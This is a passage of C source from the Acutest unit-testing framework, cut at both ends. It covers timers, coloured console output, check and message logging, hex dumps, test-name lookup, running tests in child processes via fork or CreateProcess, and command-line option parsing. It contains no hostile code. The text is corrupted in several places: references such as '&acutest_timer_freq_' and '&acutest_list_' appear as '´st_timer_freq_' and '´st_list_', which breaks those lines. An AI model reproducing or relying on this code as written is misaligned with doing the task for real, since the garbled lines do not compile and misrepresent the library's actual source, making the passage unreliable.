defined(__WINDOWS__) #define ACUTEST_WIN_ 1 #include <windows.h> #include <io.h> #endif #if defined(__APPLE__) #define ACUTEST_MACOS_ #include <assert.h> #include <stdbool.h> #include <sys/types.h> #include <unistd.h> #include <sys/sysctl.h> #endif #ifdef __cplusplus #include <exception> #endif #ifdef __has_include #if __has_include(<valgrind.h>) #include <valgrind.h> #endif #endif /* Enable the use of the non-standard keyword __attribute__ to silence warnings * under some compilers */ #if defined(__GNUC__) || defined(__clang__) #define ACUTEST_ATTRIBUTE_(attr) __attribute__((attr)) #else #define ACUTEST_ATTRIBUTE_(attr) #endif /* Note our global private identifiers end with '_' to mitigate risk of clash * with the unit tests implementation. */ #ifdef __cplusplus extern "C" { #endif #ifdef _MSC_VER /* In the multi-platform code like ours, we cannot use the non-standard * "safe" functions from Microsoft C lib like e.g. sprintf_s() instead of * standard sprintf(). Hence, lets disable the warning C4996. 
*/ #pragma warning(push) #pragma warning(disable : 4996) #endif struct acutest_test_ { const char *name; void (*func)(void); }; struct acutest_test_data_ { unsigned char flags; double duration; }; enum { ACUTEST_FLAG_RUN_ = 1 << 0, ACUTEST_FLAG_SUCCESS_ = 1 << 1, ACUTEST_FLAG_FAILURE_ = 1 << 2, }; extern const struct acutest_test_ acutest_list_[]; int acutest_check_(int cond, const char *file, int line, const char *fmt, ...); void acutest_case_(const char *fmt, ...); void acutest_message_(const char *fmt, ...); void acutest_dump_(const char *title, const void *addr, size_t size); void acutest_abort_(void) ACUTEST_ATTRIBUTE_(noreturn); #ifndef TEST_NO_MAIN static char *acutest_argv0_ = NULL; static size_t acutest_list_size_ = 0; static struct acutest_test_data_ *acutest_test_data_ = NULL; static size_t acutest_count_ = 0; static int acutest_no_exec_ = -1; static int acutest_no_summary_ = 0; static int acutest_tap_ = 0; static int acutest_skip_mode_ = 0; static int acutest_worker_ = 0; static int acutest_worker_index_ = 0; static int acutest_cond_failed_ = 0; static int acutest_was_aborted_ = 0; static FILE *acutest_xml_output_ = NULL; static int acutest_stat_failed_units_ = 0; static int acutest_stat_run_units_ = 0; static const struct acutest_test_ *acutest_current_test_ = NULL; static int acutest_current_index_ = 0; static char acutest_case_name_[TEST_CASE_MAXSIZE] = ""; static int acutest_test_already_logged_ = 0; static int acutest_case_already_logged_ = 0; static int acutest_verbose_level_ = 2; static int acutest_test_failures_ = 0; static int acutest_colorize_ = 0; static int acutest_timer_ = 0; static int acutest_abort_has_jmp_buf_ = 0; static jmp_buf acutest_abort_jmp_buf_; static void acutest_cleanup_(void) { free((void *)acutest_test_data_); } static void ACUTEST_ATTRIBUTE_(noreturn) acutest_exit_(int exit_code) { acutest_cleanup_(); exit(exit_code); } #if defined ACUTEST_WIN_ typedef LARGE_INTEGER acutest_timer_type_; static LARGE_INTEGER acutest_timer_freq_; static acutest_timer_type_ acutest_timer_start_; static acutest_timer_type_ acutest_timer_end_; static void acutest_timer_init_(void) { QueryPerformanceFrequency(´st_timer_freq_); } static void acutest_timer_get_time_(LARGE_INTEGER *ts) { QueryPerformanceCounter(ts); } static double acutest_timer_diff_(LARGE_INTEGER start, LARGE_INTEGER end) { double duration = (double)(end.QuadPart - start.QuadPart); duration /= (double)acutest_timer_freq_.QuadPart; return duration; } static void acutest_timer_print_diff_(void) { printf("%.6lf secs", acutest_timer_diff_(acutest_timer_start_, acutest_timer_end_)); } #elif defined ACUTEST_HAS_POSIX_TIMER_ static clockid_t acutest_timer_id_; typedef struct timespec acutest_timer_type_; static acutest_timer_type_ acutest_timer_start_; static acutest_timer_type_ acutest_timer_end_; static void acutest_timer_init_(void) { if (acutest_timer_ == 1) acutest_timer_id_ = CLOCK_MONOTONIC; else if (acutest_timer_ == 2) acutest_timer_id_ = CLOCK_PROCESS_CPUTIME_ID; } static void acutest_timer_get_time_(struct timespec *ts) { clock_gettime(acutest_timer_id_, ts); } static double acutest_timer_diff_(struct timespec start, struct timespec end) { double endns; double startns; endns = end.tv_sec; endns *= 1e9; endns += end.tv_nsec; startns = start.tv_sec; startns *= 1e9; startns += start.tv_nsec; return ((endns - startns) / 1e9); } static void acutest_timer_print_diff_(void) { printf("%.6lf secs", acutest_timer_diff_(acutest_timer_start_, acutest_timer_end_)); } #else typedef int acutest_timer_type_; static 
acutest_timer_type_ acutest_timer_start_; static acutest_timer_type_ acutest_timer_end_; void acutest_timer_init_(void) {} static void acutest_timer_get_time_(int *ts) { (void)ts; } static double acutest_timer_diff_(int start, int end) { (void)start; (void)end; return 0.0; } static void acutest_timer_print_diff_(void) {} #endif #define ACUTEST_COLOR_DEFAULT_ 0 #define ACUTEST_COLOR_GREEN_ 1 #define ACUTEST_COLOR_RED_ 2 #define ACUTEST_COLOR_DEFAULT_INTENSIVE_ 3 #define ACUTEST_COLOR_GREEN_INTENSIVE_ 4 #define ACUTEST_COLOR_RED_INTENSIVE_ 5 static int ACUTEST_ATTRIBUTE_(format(printf, 2, 3)) acutest_colored_printf_(int color, const char *fmt, ...) { va_list args; char buffer[256]; int n; va_start(args, fmt); vsnprintf(buffer, sizeof(buffer), fmt, args); va_end(args); buffer[sizeof(buffer) - 1] = '\0'; if (!acutest_colorize_) { return printf("%s", buffer); } #if defined ACUTEST_UNIX_ { const char *col_str; switch (color) { case ACUTEST_COLOR_GREEN_: col_str = "\033[0;32m"; break; case ACUTEST_COLOR_RED_: col_str = "\033[0;31m"; break; case ACUTEST_COLOR_GREEN_INTENSIVE_: col_str = "\033[1;32m"; break; case ACUTEST_COLOR_RED_INTENSIVE_: col_str = "\033[1;31m"; break; case ACUTEST_COLOR_DEFAULT_INTENSIVE_: col_str = "\033[1m"; break; default: col_str = "\033[0m"; break; } printf("%s", col_str); n = printf("%s", buffer); printf("\033[0m"); return n; } #elif defined ACUTEST_WIN_ { HANDLE h; CONSOLE_SCREEN_BUFFER_INFO info; WORD attr; h = GetStdHandle(STD_OUTPUT_HANDLE); GetConsoleScreenBufferInfo(h, &info); switch (color) { case ACUTEST_COLOR_GREEN_: attr = FOREGROUND_GREEN; break; case ACUTEST_COLOR_RED_: attr = FOREGROUND_RED; break; case ACUTEST_COLOR_GREEN_INTENSIVE_: attr = FOREGROUND_GREEN | FOREGROUND_INTENSITY; break; case ACUTEST_COLOR_RED_INTENSIVE_: attr = FOREGROUND_RED | FOREGROUND_INTENSITY; break; case ACUTEST_COLOR_DEFAULT_INTENSIVE_: attr = FOREGROUND_BLUE | FOREGROUND_GREEN | FOREGROUND_RED | FOREGROUND_INTENSITY; break; default: attr = 0; break; } if (attr != 0) SetConsoleTextAttribute(h, attr); n = printf("%s", buffer); SetConsoleTextAttribute(h, info.wAttributes); return n; } #else n = printf("%s", buffer); return n; #endif } static void acutest_begin_test_line_(const struct acutest_test_ *test) { if (!acutest_tap_) { if (acutest_verbose_level_ >= 3) { acutest_colored_printf_(ACUTEST_COLOR_DEFAULT_INTENSIVE_, "Test %s:\n", test->name); acutest_test_already_logged_++; } else if (acutest_verbose_level_ >= 1) { int n; char spaces[48]; n = acutest_colored_printf_(ACUTEST_COLOR_DEFAULT_INTENSIVE_, "Test %s... ", test->name); memset(spaces, ' ', sizeof(spaces)); if (n < (int)sizeof(spaces)) printf("%.*s", (int)sizeof(spaces) - n, spaces); } else { acutest_test_already_logged_ = 1; } } } static void acutest_finish_test_line_(int result) { if (acutest_tap_) { const char *str = (result == 0) ? "ok" : "not ok"; printf("%s %d - %s\n", str, acutest_current_index_ + 1, acutest_current_test_->name); if (result == 0 && acutest_timer_) { printf("# Duration: "); acutest_timer_print_diff_(); printf("\n"); } } else { int color = (result == 0) ? ACUTEST_COLOR_GREEN_INTENSIVE_ : ACUTEST_COLOR_RED_INTENSIVE_; const char *str = (result == 0) ? 
"OK" : "FAILED"; printf("[ "); acutest_colored_printf_(color, "%s", str); printf(" ]"); if (result == 0 && acutest_timer_) { printf(" "); acutest_timer_print_diff_(); } printf("\n"); } } static void acutest_line_indent_(int level) { static const char spaces[] = " "; int n = level * 2; if (acutest_tap_ && n > 0) { n--; printf("#"); } while (n > 16) { printf("%s", spaces); n -= 16; } printf("%.*s", n, spaces); } int ACUTEST_ATTRIBUTE_(format(printf, 4, 5)) acutest_check_(int cond, const char *file, int line, const char *fmt, ...) { const char *result_str; int result_color; int verbose_level; if (cond) { result_str = "ok"; result_color = ACUTEST_COLOR_GREEN_; verbose_level = 3; } else { if (!acutest_test_already_logged_ && acutest_current_test_ != NULL) acutest_finish_test_line_(-1); result_str = "failed"; result_color = ACUTEST_COLOR_RED_; verbose_level = 2; acutest_test_failures_++; acutest_test_already_logged_++; } if (acutest_verbose_level_ >= verbose_level) { va_list args; if (!acutest_case_already_logged_ && acutest_case_name_[0]) { acutest_line_indent_(1); acutest_colored_printf_(ACUTEST_COLOR_DEFAULT_INTENSIVE_, "Case %s:\n", acutest_case_name_); acutest_test_already_logged_++; acutest_case_already_logged_++; } acutest_line_indent_(acutest_case_name_[0] ? 2 : 1); if (file != NULL) { #ifdef ACUTEST_WIN_ const char *lastsep1 = strrchr(file, '\\'); const char *lastsep2 = strrchr(file, '/'); if (lastsep1 == NULL) lastsep1 = file - 1; if (lastsep2 == NULL) lastsep2 = file - 1; file = (lastsep1 > lastsep2 ? lastsep1 : lastsep2) + 1; #else const char *lastsep = strrchr(file, '/'); if (lastsep != NULL) file = lastsep + 1; #endif printf("%s:%d: Check ", file, line); } va_start(args, fmt); vprintf(fmt, args); va_end(args); printf("... "); acutest_colored_printf_(result_color, "%s", result_str); printf("\n"); acutest_test_already_logged_++; } acutest_cond_failed_ = (cond == 0); return !acutest_cond_failed_; } void ACUTEST_ATTRIBUTE_(format(printf, 1, 2)) acutest_case_(const char *fmt, ...) { va_list args; if (acutest_verbose_level_ < 2) return; if (acutest_case_name_[0]) { acutest_case_already_logged_ = 0; acutest_case_name_[0] = '\0'; } if (fmt == NULL) return; va_start(args, fmt); vsnprintf(acutest_case_name_, sizeof(acutest_case_name_) - 1, fmt, args); va_end(args); acutest_case_name_[sizeof(acutest_case_name_) - 1] = '\0'; if (acutest_verbose_level_ >= 3) { acutest_line_indent_(1); acutest_colored_printf_(ACUTEST_COLOR_DEFAULT_INTENSIVE_, "Case %s:\n", acutest_case_name_); acutest_test_already_logged_++; acutest_case_already_logged_++; } } void ACUTEST_ATTRIBUTE_(format(printf, 1, 2)) acutest_message_(const char *fmt, ...) { char buffer[TEST_MSG_MAXSIZE]; char *line_beg; char *line_end; va_list args; if (acutest_verbose_level_ < 2) return; /* We allow extra message only when something is already wrong in the * current test. */ if (acutest_current_test_ == NULL || !acutest_cond_failed_) return; va_start(args, fmt); vsnprintf(buffer, TEST_MSG_MAXSIZE, fmt, args); va_end(args); buffer[TEST_MSG_MAXSIZE - 1] = '\0'; line_beg = buffer; while (1) { line_end = strchr(line_beg, '\n'); if (line_end == NULL) break; acutest_line_indent_(acutest_case_name_[0] ? 3 : 2); printf("%.*s\n", (int)(line_end - line_beg), line_beg); line_beg = line_end + 1; } if (line_beg[0] != '\0') { acutest_line_indent_(acutest_case_name_[0] ? 
3 : 2); printf("%s\n", line_beg); } } void acutest_dump_(const char *title, const void *addr, size_t size) { static const size_t BYTES_PER_LINE = 16; size_t line_beg; size_t truncate = 0; if (acutest_verbose_level_ < 2) return; /* We allow extra message only when something is already wrong in the * current test. */ if (acutest_current_test_ == NULL || !acutest_cond_failed_) return; if (size > TEST_DUMP_MAXSIZE) { truncate = size - TEST_DUMP_MAXSIZE; size = TEST_DUMP_MAXSIZE; } acutest_line_indent_(acutest_case_name_[0] ? 3 : 2); printf((title[strlen(title) - 1] == ':') ? "%s\n" : "%s:\n", title); for (line_beg = 0; line_beg < size; line_beg += BYTES_PER_LINE) { size_t line_end = line_beg + BYTES_PER_LINE; size_t off; acutest_line_indent_(acutest_case_name_[0] ? 4 : 3); printf("%08lx: ", (unsigned long)line_beg); for (off = line_beg; off < line_end; off++) { if (off < size) printf(" %02x", ((const unsigned char *)addr)[off]); else printf(" "); } printf(" "); for (off = line_beg; off < line_end; off++) { unsigned char byte = ((const unsigned char *)addr)[off]; if (off < size) printf("%c", (iscntrl(byte) ? '.' : byte)); else break; } printf("\n"); } if (truncate > 0) { acutest_line_indent_(acutest_case_name_[0] ? 4 : 3); printf(" ... (and more %u bytes)\n", (unsigned)truncate); } } /* This is called just before each test */ static void acutest_init_(const char *test_name) { #ifdef TEST_INIT TEST_INIT; /* Allow for a single unterminated function call */ #endif /* Suppress any warnings about unused variable. */ (void)test_name; } /* This is called after each test */ static void acutest_fini_(const char *test_name) { #ifdef TEST_FINI TEST_FINI; /* Allow for a single unterminated function call */ #endif /* Suppress any warnings about unused variable. */ (void)test_name; } void acutest_abort_(void) { if (acutest_abort_has_jmp_buf_) { longjmp(acutest_abort_jmp_buf_, 1); } else { if (acutest_current_test_ != NULL) acutest_fini_(acutest_current_test_->name); abort(); } } static void acutest_list_names_(void) { const struct acutest_test_ *test; printf("Unit tests:\n"); for (test = ´st_list_[0]; test->func != NULL; test++) printf(" %s\n", test->name); } static void acutest_remember_(int i) { if (acutest_test_data_[i].flags & ACUTEST_FLAG_RUN_) return; acutest_test_data_[i].flags |= ACUTEST_FLAG_RUN_; acutest_count_++; } static void acutest_set_success_(int i, int success) { acutest_test_data_[i].flags |= success ? ACUTEST_FLAG_SUCCESS_ : ACUTEST_FLAG_FAILURE_; } static void acutest_set_duration_(int i, double duration) { acutest_test_data_[i].duration = duration; } static int acutest_name_contains_word_(const char *name, const char *pattern) { static const char word_delim[] = " \t-_/.,:;"; const char *substr; size_t pattern_len; pattern_len = strlen(pattern); substr = strstr(name, pattern); while (substr != NULL) { int starts_on_word_boundary = (substr == name || strchr(word_delim, substr[-1]) != NULL); int ends_on_word_boundary = (substr[pattern_len] == '\0' || strchr(word_delim, substr[pattern_len]) != NULL); if (starts_on_word_boundary && ends_on_word_boundary) return 1; substr = strstr(substr + 1, pattern); } return 0; } static int acutest_lookup_(const char *pattern) { int i; int n = 0; /* Try exact match. */ for (i = 0; i < (int)acutest_list_size_; i++) { if (strcmp(acutest_list_[i].name, pattern) == 0) { acutest_remember_(i); n++; break; } } if (n > 0) return n; /* Try word match. 
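 * A word match means the pattern lines up with whole delimiter-separated
 * words of the test name (see word_delim above); e.g. "map" would match a
 * test named "mem-map", but not one named "remap".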
*/ for (i = 0; i < (int)acutest_list_size_; i++) { if (acutest_name_contains_word_(acutest_list_[i].name, pattern)) { acutest_remember_(i); n++; } } if (n > 0) return n; /* Try relaxed match. */ for (i = 0; i < (int)acutest_list_size_; i++) { if (strstr(acutest_list_[i].name, pattern) != NULL) { acutest_remember_(i); n++; } } return n; } /* Called if anything goes bad in Acutest, or if the unit test ends in other * way then by normal returning from its function (e.g. exception or some * abnormal child process termination). */ static void ACUTEST_ATTRIBUTE_(format(printf, 1, 2)) acutest_error_(const char *fmt, ...) { if (acutest_verbose_level_ == 0) return; if (acutest_verbose_level_ >= 2) { va_list args; acutest_line_indent_(1); if (acutest_verbose_level_ >= 3) acutest_colored_printf_(ACUTEST_COLOR_RED_INTENSIVE_, "ERROR: "); va_start(args, fmt); vprintf(fmt, args); va_end(args); printf("\n"); } if (acutest_verbose_level_ >= 3) { printf("\n"); } } /* Call directly the given test unit function. */ static int acutest_do_run_(const struct acutest_test_ *test, int index) { int status = -1; acutest_was_aborted_ = 0; acutest_current_test_ = test; acutest_current_index_ = index; acutest_test_failures_ = 0; acutest_test_already_logged_ = 0; acutest_cond_failed_ = 0; #ifdef __cplusplus try { #endif acutest_init_(test->name); acutest_begin_test_line_(test); /* This is good to do in case the test unit crashes. */ fflush(stdout); fflush(stderr); if (!acutest_worker_) { acutest_abort_has_jmp_buf_ = 1; if (setjmp(acutest_abort_jmp_buf_) != 0) { acutest_was_aborted_ = 1; goto aborted; } } acutest_timer_get_time_(´st_timer_start_); test->func(); aborted: acutest_abort_has_jmp_buf_ = 0; acutest_timer_get_time_(´st_timer_end_); if (acutest_verbose_level_ >= 3) { acutest_line_indent_(1); if (acutest_test_failures_ == 0) { acutest_colored_printf_(ACUTEST_COLOR_GREEN_INTENSIVE_, "SUCCESS: "); printf("All conditions have passed.\n"); if (acutest_timer_) { acutest_line_indent_(1); printf("Duration: "); acutest_timer_print_diff_(); printf("\n"); } } else { acutest_colored_printf_(ACUTEST_COLOR_RED_INTENSIVE_, "FAILED: "); if (!acutest_was_aborted_) { printf("%d condition%s %s failed.\n", acutest_test_failures_, (acutest_test_failures_ == 1) ? "" : "s", (acutest_test_failures_ == 1) ? "has" : "have"); } else { printf("Aborted.\n"); } } printf("\n"); } else if (acutest_verbose_level_ >= 1 && acutest_test_failures_ == 0) { acutest_finish_test_line_(0); } status = (acutest_test_failures_ == 0) ? 0 : -1; #ifdef __cplusplus } catch (std::exception &e) { const char *what = e.what(); acutest_check_(0, NULL, 0, "Threw std::exception"); if (what != NULL) acutest_message_("std::exception::what(): %s", what); if (acutest_verbose_level_ >= 3) { acutest_line_indent_(1); acutest_colored_printf_(ACUTEST_COLOR_RED_INTENSIVE_, "FAILED: "); printf("C++ exception.\n\n"); } } catch (...) { acutest_check_(0, NULL, 0, "Threw an exception"); if (acutest_verbose_level_ >= 3) { acutest_line_indent_(1); acutest_colored_printf_(ACUTEST_COLOR_RED_INTENSIVE_, "FAILED: "); printf("C++ exception.\n\n"); } } #endif acutest_fini_(test->name); acutest_case_(NULL); acutest_current_test_ = NULL; return status; } /* Trigger the unit test. If possible (and not suppressed) it starts a child * process who calls acutest_do_run_(), otherwise it calls acutest_do_run_() * directly. 
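 * (The child process is skipped when --no-exec is given, and on platforms
 * where neither fork() nor CreateProcess() is available.)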
*/ static void acutest_run_(const struct acutest_test_ *test, int index, int master_index) { int failed = 1; acutest_timer_type_ start, end; acutest_current_test_ = test; acutest_test_already_logged_ = 0; acutest_timer_get_time_(&start); if (!acutest_no_exec_) { #if defined(ACUTEST_UNIX_) pid_t pid; int exit_code; /* Make sure the child starts with empty I/O buffers. */ fflush(stdout); fflush(stderr); pid = fork(); if (pid == (pid_t)-1) { acutest_error_("Cannot fork. %s [%d]", strerror(errno), errno); failed = 1; } else if (pid == 0) { /* Child: Do the test. */ acutest_worker_ = 1; failed = (acutest_do_run_(test, index) != 0); acutest_exit_(failed ? 1 : 0); } else { /* Parent: Wait until child terminates and analyze its exit code. */ waitpid(pid, &exit_code, 0); if (WIFEXITED(exit_code)) { switch (WEXITSTATUS(exit_code)) { case 0: failed = 0; break; /* test has passed. */ case 1: /* noop */ break; /* "normal" failure. */ default: acutest_error_("Unexpected exit code [%d]", WEXITSTATUS(exit_code)); } } else if (WIFSIGNALED(exit_code)) { char tmp[32]; const char *signame; switch (WTERMSIG(exit_code)) { case SIGINT: signame = "SIGINT"; break; case SIGHUP: signame = "SIGHUP"; break; case SIGQUIT: signame = "SIGQUIT"; break; case SIGABRT: signame = "SIGABRT"; break; case SIGKILL: signame = "SIGKILL"; break; case SIGSEGV: signame = "SIGSEGV"; break; case SIGILL: signame = "SIGILL"; break; case SIGTERM: signame = "SIGTERM"; break; default: sprintf(tmp, "signal %d", WTERMSIG(exit_code)); signame = tmp; break; } acutest_error_("Test interrupted by %s.", signame); } else { acutest_error_("Test ended in an unexpected way [%d].", exit_code); } } #elif defined(ACUTEST_WIN_) char buffer[512] = {0}; STARTUPINFOA startupInfo; PROCESS_INFORMATION processInfo; DWORD exitCode; /* Windows has no fork(). So we propagate all info into the child * through a command line arguments. */ _snprintf(buffer, sizeof(buffer) - 1, "%s --worker=%d %s --no-exec --no-summary %s --verbose=%d " "--color=%s -- \"%s\"", acutest_argv0_, index, acutest_timer_ ? "--time" : "", acutest_tap_ ? "--tap" : "", acutest_verbose_level_, acutest_colorize_ ? "always" : "never", test->name); memset(&startupInfo, 0, sizeof(startupInfo)); startupInfo.cb = sizeof(STARTUPINFO); if (CreateProcessA(NULL, buffer, NULL, NULL, FALSE, 0, NULL, NULL, &startupInfo, &processInfo)) { WaitForSingleObject(processInfo.hProcess, INFINITE); GetExitCodeProcess(processInfo.hProcess, &exitCode); CloseHandle(processInfo.hThread); CloseHandle(processInfo.hProcess); failed = (exitCode != 0); if (exitCode > 1) { switch (exitCode) { case 3: acutest_error_("Aborted."); break; case 0xC0000005: acutest_error_("Access violation."); break; default: acutest_error_("Test ended in an unexpected way [%lu].", exitCode); break; } } } else { acutest_error_("Cannot create unit test subprocess [%ld].", GetLastError()); failed = 1; } #else /* A platform where we don't know how to run child process. */ failed = (acutest_do_run_(test, index) != 0); #endif } else { /* Child processes suppressed through --no-exec. */ failed = (acutest_do_run_(test, index) != 0); } acutest_timer_get_time_(&end); acutest_current_test_ = NULL; acutest_stat_run_units_++; if (failed) acutest_stat_failed_units_++; acutest_set_success_(master_index, !failed); acutest_set_duration_(master_index, acutest_timer_diff_(start, end)); } #if defined(ACUTEST_WIN_) /* Callback for SEH events. 
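 * (Installed from main() below via SetUnhandledExceptionFilter(); it
 * reports an otherwise-fatal structured exception as a failed check plus
 * two diagnostic messages before the process is allowed to terminate.)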
*/ static LONG CALLBACK acutest_seh_exception_filter_(EXCEPTION_POINTERS *ptrs) { acutest_check_(0, NULL, 0, "Unhandled SEH exception"); acutest_message_("Exception code: 0x%08lx", ptrs->ExceptionRecord->ExceptionCode); acutest_message_("Exception address: 0x%p", ptrs->ExceptionRecord->ExceptionAddress); fflush(stdout); fflush(stderr); return EXCEPTION_EXECUTE_HANDLER; } #endif #define ACUTEST_CMDLINE_OPTFLAG_OPTIONALARG_ 0x0001 #define ACUTEST_CMDLINE_OPTFLAG_REQUIREDARG_ 0x0002 #define ACUTEST_CMDLINE_OPTID_NONE_ 0 #define ACUTEST_CMDLINE_OPTID_UNKNOWN_ (-0x7fffffff + 0) #define ACUTEST_CMDLINE_OPTID_MISSINGARG_ (-0x7fffffff + 1) #define ACUTEST_CMDLINE_OPTID_BOGUSARG_ (-0x7fffffff + 2) typedef struct acutest_test_CMDLINE_OPTION_ { char shortname; const char *longname; int id; unsigned flags; } ACUTEST_CMDLINE_OPTION_; static int acutest_cmdline_handle_short_opt_group_( const ACUTEST_CMDLINE_OPTION_ *options, const char *arggroup, int (*callback)(int /*optval*/, const char * /*arg*/)) { const ACUTEST_CMDLINE_OPTION_ *opt; int i; int ret = 0; for (i = 0; arggroup[i] != '\0'; i++) { for (opt = options; opt->id != 0; opt++) { if (arggroup[i] == opt->shortname) break; } if (opt->id != 0 && !(opt->flags & ACUTEST_CMDLINE_OPTFLAG_REQUIREDARG_)) { ret = callback(opt->id, NULL); } else { /* Unknown option. */ char badoptname[3]; badoptname[0] = '-'; badoptname[1] = arggroup[i]; badoptname[2] = '\0'; ret = callback((opt->id != 0 ? ACUTEST_CMDLINE_OPTID_MISSINGARG_ : ACUTEST_CMDLINE_OPTID_UNKNOWN_), badoptname); } if (ret != 0) break; } return ret; } #define ACUTEST_CMDLINE_AUXBUF_SIZE_ 32 static int acutest_cmdline_read_(const ACUTEST_CMDLINE_OPTION_ *options, int argc, char **argv, int (*callback)(int /*optval*/, const char * /*arg*/)) { const ACUTEST_CMDLINE_OPTION_ *opt; char auxbuf[ACUTEST_CMDLINE_AUXBUF_SIZE_ + 1]; int after_doubledash = 0; int i = 1; int ret = 0; auxbuf[ACUTEST_CMDLINE_AUXBUF_SIZE_] = '\0'; while (i < argc) { if (after_doubledash || strcmp(argv[i], "-") == 0) { /* Non-option argument. */ ret = callback(ACUTEST_CMDLINE_OPTID_NONE_, argv[i]); } else if (strcmp(argv[i], "--") == 0) { /* End of options. All the remaining members are non-option * arguments. */ after_doubledash = 1; } else if (argv[i][0] != '-') { /* Non-option argument. */ ret = callback(ACUTEST_CMDLINE_OPTID_NONE_, argv[i]); } else { for (opt = options; opt->id != 0; opt++) { if (opt->longname != NULL && strncmp(argv[i], "--", 2) == 0) { size_t len = strlen(opt->longname); if (strncmp(argv[i] + 2, opt->longname, len) == 0) { /* Regular long option. */ if (argv[i][2 + len] == '\0') { /* with no argument provided. */ if (!(opt->flags & ACUTEST_CMDLINE_OPTFLAG_REQUIREDARG_)) ret = callback(opt->id, NULL); else ret = callback( ACUTEST_CMDLINE_OPTID_MISSINGARG_, argv[i]); break; } else if (argv[i][2 + len] == '=') { /* with an argument provided. */ if (opt->flags & (ACUTEST_CMDLINE_OPTFLAG_OPTIONALARG_ | ACUTEST_CMDLINE_OPTFLAG_REQUIREDARG_)) { ret = callback(opt->id, argv[i] + 2 + len + 1); } else { sprintf(auxbuf, "--%s", opt->longname); ret = callback(ACUTEST_CMDLINE_OPTID_BOGUSARG_, auxbuf); } break; } else { continue; } } } else if (opt->shortname != '\0' && argv[i][0] == '-') { if (argv[i][1] == opt->shortname) { /* Regular short option. 
*/ if (opt->flags & ACUTEST_CMDLINE_OPTFLAG_REQUIREDARG_) { if (argv[i][2] != '\0') ret = callback(opt->id, argv[i] + 2); else if (i + 1 < argc) ret = callback(opt->id, argv[++i]); else ret = callback( ACUTEST_CMDLINE_OPTID_MISSINGARG_, argv[i]); break; } else { ret = callback(opt->id, NULL); /* There might be more (argument-less) short options * grouped together. */ if (ret == 0 && argv[i][2] != '\0') ret = acutest_cmdline_handle_short_opt_group_( options, argv[i] + 2, callback); break; } } } } if (opt->id == 0) { /* still not handled? */ if (argv[i][0] != '-') { /* Non-option argument. */ ret = callback(ACUTEST_CMDLINE_OPTID_NONE_, argv[i]); } else { /* Unknown option. */ char *badoptname = argv[i]; if (strncmp(badoptname, "--", 2) == 0) { /* Strip any argument from the long option. */ char *assignment = strchr(badoptname, '='); if (assignment != NULL) { size_t len = assignment - badoptname; if (len > ACUTEST_CMDLINE_AUXBUF_SIZE_) len = ACUTEST_CMDLINE_AUXBUF_SIZE_; strncpy(auxbuf, badoptname, len); auxbuf[len] = '\0'; badoptname = auxbuf; } } ret = callback(ACUTEST_CMDLINE_OPTID_UNKNOWN_, badoptname); } } } if (ret != 0) return ret; i++; } return ret; } static void acutest_help_(void) { printf("Usage: %s [options] [test...]\n", acutest_argv0_); printf("\n"); printf("Run the specified unit tests; or if the option '--skip' is used, " "run all\n"); printf("tests in the suite but those listed. By default, if no tests are " "specified\n"); printf("on the command line, all unit tests in the suite are run.\n"); printf("\n"); printf("Options:\n"); printf( " -s, --skip Execute all unit tests but the listed ones\n"); printf(" --exec[=WHEN] If supported, execute unit tests as child " "processes\n"); printf(" (WHEN is one of 'auto', 'always', " "'never')\n"); printf(" -E, --no-exec Same as --exec=never\n"); #if defined ACUTEST_WIN_ printf(" -t, --time Measure test duration\n"); #elif defined ACUTEST_HAS_POSIX_TIMER_ printf(" -t, --time Measure test duration (real time)\n"); printf( " --time=TIMER Measure test duration, using given timer\n"); printf(" (TIMER is one of 'real', 'cpu')\n"); #endif printf( " --no-summary Suppress printing of test results summary\n"); printf(" --tap Produce TAP-compliant output\n"); printf(" (See https://testanything.org/)\n"); printf(" -x, --xml-output=FILE Enable XUnit output to the given file\n"); printf(" -l, --list List unit tests in the suite and exit\n"); printf(" -v, --verbose Make output more verbose\n"); printf(" --verbose=LEVEL Set verbose level to LEVEL:\n"); printf(" 0 ... Be silent\n"); printf(" 1 ... Output one line per test (and " "summary)\n"); printf(" 2 ... As 1 and failed conditions (this " "is default)\n"); printf(" 3 ... 
As 1 and all conditions (and " "extended summary)\n"); printf(" -q, --quiet Same as --verbose=0\n"); printf(" --color[=WHEN] Enable colorized output\n"); printf(" (WHEN is one of 'auto', 'always', " "'never')\n"); printf(" --no-color Same as --color=never\n"); printf(" -h, --help Display this help and exit\n"); if (acutest_list_size_ < 16) { printf("\n"); acutest_list_names_(); } } static const ACUTEST_CMDLINE_OPTION_ acutest_cmdline_options_[] = { {'s', "skip", 's', 0}, {0, "exec", 'e', ACUTEST_CMDLINE_OPTFLAG_OPTIONALARG_}, {'E', "no-exec", 'E', 0}, #if defined ACUTEST_WIN_ {'t', "time", 't', 0}, {0, "timer", 't', 0}, /* kept for compatibility */ #elif defined ACUTEST_HAS_POSIX_TIMER_ {'t', "time", 't', ACUTEST_CMDLINE_OPTFLAG_OPTIONALARG_}, {0, "timer", 't', ACUTEST_CMDLINE_OPTFLAG_OPTIONALARG_}, /* kept for compatibility */ #endif {0, "no-summary", 'S', 0}, {0, "tap", 'T', 0}, {'l', "list", 'l', 0}, {'v', "verbose", 'v', ACUTEST_CMDLINE_OPTFLAG_OPTIONALARG_}, {'q', "quiet", 'q', 0}, {0, "color", 'c', ACUTEST_CMDLINE_OPTFLAG_OPTIONALARG_}, {0, "no-color", 'C', 0}, {'h', "help", 'h', 0}, {0, "worker", 'w', ACUTEST_CMDLINE_OPTFLAG_REQUIREDARG_}, /* internal */ {'x', "xml-output", 'x', ACUTEST_CMDLINE_OPTFLAG_REQUIREDARG_}, {0, NULL, 0, 0}}; static int acutest_cmdline_callback_(int id, const char *arg) { switch (id) { case 's': acutest_skip_mode_ = 1; break; case 'e': if (arg == NULL || strcmp(arg, "always") == 0) { acutest_no_exec_ = 0; } else if (strcmp(arg, "never") == 0) { acutest_no_exec_ = 1; } else if (strcmp(arg, "auto") == 0) { /*noop*/ } else { fprintf(stderr, "%s: Unrecognized argument '%s' for option --exec.\n", acutest_argv0_, arg); fprintf(stderr, "Try '%s --help' for more information.\n", acutest_argv0_); acutest_exit_(2); } break; case 'E': acutest_no_exec_ = 1; break; case 't': #if defined ACUTEST_WIN_ || defined ACUTEST_HAS_POSIX_TIMER_ if (arg == NULL || strcmp(arg, "real") == 0) { acutest_timer_ = 1; #ifndef ACUTEST_WIN_ } else if (strcmp(arg, "cpu") == 0) { acutest_timer_ = 2; #endif } else { fprintf(stderr, "%s: Unrecognized argument '%s' for option --time.\n", acutest_argv0_, arg); fprintf(stderr, "Try '%s --help' for more information.\n", acutest_argv0_); acutest_exit_(2); } #endif break; case 'S': acutest_no_summary_ = 1; break; case 'T': 